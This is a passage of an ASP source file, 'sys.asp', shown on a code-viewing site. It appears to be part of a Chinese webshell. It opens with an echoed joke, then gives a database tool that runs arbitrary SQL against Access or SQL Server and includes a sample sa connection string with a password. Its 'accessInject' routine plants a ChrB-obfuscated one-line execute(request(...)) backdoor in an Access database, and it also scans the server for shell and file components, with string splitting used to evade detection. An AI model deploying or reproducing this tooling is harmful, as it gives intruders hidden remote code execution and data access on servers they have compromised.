📄 sys.asp
字号:
echo " 战争刚刚结束,战场上的勇士们回到了日夜想念的故乡。这天,一名女记者正在采访一个军人。"
echo "“战争结束后,你回家做的第一件事儿是什么?”女记者问。"
echo "“当然是和妻子做‘那个’啦!”军人直率的答道。"
echo "女记者有些不好意思,又接着问道:"
echo "“那么,第二件事儿呢?” "
echo "“再做一遍。” "
echo "女记者羞愧得满脸通红: "
echo "“除了‘那个’……我想知道‘那个’结束后,你做的第一件事儿。” "
echo "军人想了想,说道: "
echo "“嗯……,我脱掉了那个沉重的军用背包。” "
echo ""
End Sub
Sub pageMsDataBase()
Dim theAct, sqlStr
theAct = Request("theAct")
sqlStr = Request("sqlStr")
showTitle("mdb+mssql数据库操作页")
If sqlStr = "" Then
If Session(m & "sqlStr") = "" Then
sqlStr = "e:\meihuaTop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;"
Else
sqlStr = Session(m & "sqlStr")
End If
End If
Session(m & "sqlStr") = sqlStr
echo "<style>body{margin:8;}</style>"
echo "<form method=post action='?meihua=MsDataBase&theAct=showTables' onSubmit='this.Submit.disabled=true;'>"
echo "<a href='?meihua=MsDataBase'>mdb+mssql数据库操作</a><br/>"
echo "<input name=sqlStr type=text id=sqlStr value=""" & sqlStr & """ size=60 style='width:80%;'>"
echo "<input name=theAct type=hidden value=showTables><br/>"
echo "<input type=Submit name=Submit value=' 提交 '>"
echo "<input type=button name=Submit2 value=' 插入 ' onclick=""if(confirm('这里是在ACESS数据里插入ASP\n默认密码是" & clientPassword & "\n插入后可以使用的前提是\n数据库是asp后缀, 并且没有错乱asp代码\n确认操作吗?')){location.href='?meihua=MsDataBase&theAct=inject&sqlStr='+this.form.sqlStr.value;this.disabled=true;}"">"
echo "<input type=button value=' 示例 ' onclick=""this.form.sqlStr.value='e:\\meihuaTop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;';"">"
echo "</form>"
echo "<hr/>注: 插入只针对ACCESS操作, 要浏览ACCESS在表单中的写法是""d:\bbs.mdb"", SQL据库写法是""sql:连接字符串"", 不要忘写sql:。<hr/>"
Select Case theAct
Case "showTables"
showTables()
Case "query"
showQuery()
Case "inject"
accessInject()
End Select
echo ""
End Sub
Sub showTables()
If isDebugMode = False Then
On Error Resume Next
End If
Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr
sqlStr = Request("sqlStr")
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set conn = Server.CreateObject("ADO"&T&"DB.Conne"&T&"ction")
conn.Open connStr
chkErr(Err)
tablesStr = getTableList(conn, sqlStr, rsTable)
echo "<a href=""?meihua=MsDataBase&theAct=showTables&sqlStr=" & UrlEncode(sqlStr) & """>数据库表结构查看:</a><br/>"
echo tablesStr & "<hr/>"
echo "<a href=""?meihua=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & """>转到SQL命令执行</a><hr/>"
Do Until rsTable.Eof
Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").value))
echo "<table border=0 cellpadding=0 cellspacing=0><tr><td height=22 colspan=6><b>" & rsTable("Table_Name") & "</b></td>"
echo "</tr><tr><td colspan=6><hr/></td></tr><tr align=center>"
echo "<td>字段名</td><td>类型</td><td>大小</td><td>精度</td><td>允许为空</td><td>默认值</td></tr>"
echo "<tr><td colspan=6><hr/></td></tr>"
Do Until rsColumn.Eof
echo "<tr align=center>"
echo "<td align=Left> " & rsColumn("Column_Name") & "</td>"
echo "<td width=80>" & getDataType(rsColumn("Data_Type")) & "</td>"
echo "<td width=70>" & rsColumn("Character_Maximum_Length") & "</td>"
echo "<td width=70>" & rsColumn("Numeric_Precision") & "</td>"
echo "<td width=70>" & rsColumn("Is_Nullable") & "</td>"
echo "<td width=80>" & rsColumn("Column_Default") & "</td>"
echo "</tr>"
rsColumn.MoveNext
Loop
echo "<tr><td colspan=6><hr/></td></tr></table>"
rsTable.MoveNext
Loop
echo "<hr/>"
conn.Close
Set conn = Nothing
Set rsTable = Nothing
Set rsColumn = Nothing
End Sub
Sub showQuery()
If isDebugMode = False Then
On Error Resume Next
End If
Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable
sql = Request("sql")
page = Request("page")
sqlStr = Request("sqlStr")
theTable = Request("theTable")
If Not IsNumeric(page) or page = "" Then
page = 1
End If
If sql = "" And theTable <> "" Then
sql = "Select top " & dbSelectNumber & " * from [" & theTable & "]"
End If
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set rs = Server.CreateObject("Adodb.RecordSet")
Set conn = Server.CreateObject("ADO"&T&"DB.Conne"&T&"ction")
conn.Open connStr
chkErr(Err)
tablesStr = getTableList(conn, sqlStr, rsTable)
echo "<a href=""?meihua=MsDataBase&theAct=showTables&sqlStr=" & UrlEncode(sqlStr) & """>数据库表结构查看:</a><br/>"
echo tablesStr & "<hr/>"
echo "<a href=?meihua=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&sql=" & UrlEncode(sql) & ">SQL命令执行及查看</a>"
echo "<br/><form method=post action=""?meihua=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & """>"
echo "<input name=sql type=text id=sql value=""" & HtmlEncode(sql) & """ size=60>"
echo "<input type=Submit name=Submit4 value=执行查询><hr/>"
If sql <> "" And Left(LCase(sql), 7) = "select " Then
rs.Open sql, conn, 1, 1
chkErr(Err)
rs.PageSize = 20
If Not rs.Eof Then
rs.AbsolutePage = page
End If
If rs.Fields.Count>0 Then
echo "<br><table border=""1"" cellpadding=""0"" cellspacing=""0"" width=""98%"">"
echo "<tr>"
echo "<td height=""22"" align=""center"" class=""tr"" colspan=""" & rs.Fields.Count & """>SQL操作 - 执行结果</td>"
echo "</tr>"
echo "<tr>"
For j = 0 To rs.Fields.Count-1
echo "<td height=""22"" align=""center"" class=""td""> " & rs.Fields(j).Name & " </td>"
Next
For i = 1 To 20
If rs.Eof Then
Exit For
End If
echo "</tr>"
echo "<tr valign=top>"
For j = 0 To rs.Fields.Count-1
echo "<td height=""22"" align=""center"">" & HtmlEncode(fixNull(rs(j))) & "</td>"
Next
echo "</tr>"
rs.MoveNext
Next
End If
echo "<tr>"
echo "<td height=""22"" align=""center"" class=""td"" colspan=""" & rs.Fields.Count & """>"
For i = 1 To rs.PageCount
echo Replace("<a href=""?meihua=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&sql=" & UrlEncode(sql) & "&page=" & i & """><font {$font" & i & "}>" & i & "</font></a> ", "{$font" & page & "}", "class=warningColor")
Next
echo "</td></tr></table>"
rs.Close
Else
If sql <> "" Then
conn.Execute(sql)
chkErr(Err)
echo "<center><br>执行完毕!</center>"
End If
End If
echo "</form><hr/>"
conn.Close
Set rs = Nothing
Set conn = Nothing
Set rsTable = Nothing
End Sub
Function getDataType(typeId)
Select Case typeId
Case 130
getDataType = "文本"
Case 2
getDataType = "整型"
Case 3
getDataType = "长整型"
Case 7
getDataType = "日期/时间"
Case 5
getDataType = "双精度型"
Case 11
getDataType = "是/否"
Case 128
getDataType = "OLE 对象"
Case Else
getDataType = typeId
End Select
End Function
Sub accessInject()
If isDebugMode = False Then
On Error Resume Next
End If
Dim rs, conn, sqlStr, connStr
sqlStr = Request("sqlStr")
If LCase(Left(sqlStr, 4)) = "sql:" Then
showErr("插入只对ACCESS数据库有效!")
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set rs = Server.CreateObject("Adodb.RecordSet")
Set conn = Server.CreateObject("ADO"&T&"DB.Conne"&T&"ction")
conn.Open connStr
chkErr(Err)
If notdownloadsExists = True Then
conn.Execute("drop table notdownloads")
End If
conn.Execute("create table notdownloads(notdownloads oleobject)")
rs.Open "notdownloads", conn, 1, 3
rs.AddNew
rs("notdownloads").AppendChunk(ChrB(Asc("<")) & ChrB(Asc("%")) & ChrB(Asc("e")) & ChrB(Asc("x")) & ChrB(Asc("e")) & ChrB(Asc("c")) & ChrB(Asc("u")) & ChrB(Asc("t")) & ChrB(Asc("e")) & ChrB(Asc("(")) & ChrB(Asc("r")) & ChrB(Asc("e")) & ChrB(Asc("q")) & ChrB(Asc("u")) & ChrB(Asc("e")) & ChrB(Asc("s")) & ChrB(Asc("t")) & ChrB(Asc("(")) & ChrB(Asc("""")) & ChrB(Asc(clientPassword)) & ChrB(Asc("""")) & ChrB(Asc(")")) & ChrB(Asc(")")) & ChrB(Asc("%")) & ChrB(Asc(">")) & ChrB(Asc(" ")))
rs.Update
rs.Close
echo "<script language=""javascript"">alert('插入成功!');history.back();</script>"
conn.Close
Set rs = Nothing
Set conn = Nothing
End Sub
Function getTableList(conn, sqlStr, rsTable)
Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))
Do Until rsTable.Eof
getTableList = getTableList & "<a href=""?meihua=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&theTable=" & UrlEncode(rsTable("Table_Name")) & """>[" & rsTable("Table_Name") & "]</a> "
rsTable.MoveNext
Loop
rsTable.MoveFirst
End Function
Sub PageObjOnSrv()
Dim i, objTmp, txtObjInfo, strObjectList, strDscList
txtObjInfo = Trim(Request("txtObjInfo"))
strObjectList = "MSWC.AdRotator,MSWC.BrowserType,MSWC.NextLink,MSWC.Tools,MSWC.Status,MSWC.Counters,IISSample.ContentRotator," & _
"IISSample.PageCounter,MSWC.PermissionChecker,ADO"&T&"DB.Conne"&T&"ction,SoftArtisans.FileUp,SoftArtisans.FileManager,LyfUpload.UploadFile," & _
"Persits.Upload.1,W3.Upload,JMail.SmtpMail,CDONTS.NewMail,Persits.MailSender,SMTPsvg.Mailer,DkQmail.Qmail,Geocel.Mailer," & _
"IISmail.Iismail.1,SmtpMail.SmtpMail.1,SoftArtisans.ImageGen,W3Image.Image," & _
"Scripting.FileSystemObject,Adodb.Stream,She"&T&"ll.Appl"&T&"ication,WScri"&T&"pt.She"&T&"ll,Wscript.banwork"
strDscList = "广告轮换,浏览器信息,内容链接库,,,计数器,内容轮显,,权限检测,ADO 数据对象,SA-FileUp 文件上传,SoftArtisans 文件管理," & _
"刘云峰的文件上传组件,ASPUpload 文件上传,Dimac 文件上传,Dimac JMail 邮件收发,虚拟 SMTP 发信,ASPemail 发信,ASPmail 发信,dkQmail 发信," & _
"Geocel 发信,IISmail 发信,SmtpMail 发信,SA 的图像读写,Dimac 的图像读写组件," & _
"FSO,Stream 流,,,"
aryObjectList = Split(strObjectList, ",")
aryDscList = Split(strDscList, ",")
showTitle("服务器组件支持情况检测")
echo "其他组件支持情况检测<br/>"
echo "在下面的输入框中输入你要检测的组件的ProgId或ClassId。<br/>"
echo "<form method=post>"
echo "<input name=txtObjInfo size=30 value=""" & txtObjInfo & """><input name=theAct type=submit value=我要检测>"
echo "</form>"
If Request("theAct") = "我要检测" And txtObjInfo <> "" Then
Call getObjInfo(txtObjInfo, "")
End If
echo "<hr/>"
echo "<lu>组件名称 ┆ 支持及其它"
For i = 0 To UBound(aryDscList)
Call getObjInfo(aryObjectList(i), aryDscList(i))
Next
echo "</lu><hr/>"
End Sub
Sub getObjInfo(strObjInfo, strDscInfo)
Dim objTmp
If isDebugMode = False Then
On Error Resume Next
End If
echo "<li> " & strObjInfo
If strDscInfo <> "" Then
echo " (" & strDscInfo & "组件)"
End If
echo " ┆ "
Set objTmp = Server.CreateObject(strObjInfo)
If Err <> -2147221005 Then
echo "√ "
echo "Version: " & objTmp.Version & "; "
echo "About: " & objTmp.About
Else
echo "×"
End If
echo "</li>"
If Err Then
Err.Clear
End If
Set objTmp = Nothing
End Sub
Sub PageOtherTools()
Dim theAct
theAct = Request("theAct")
showTitle("一些零碎的小东西")
Select Case theAct
Case "downFromUrl"
downFromUrl()
Response.End
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -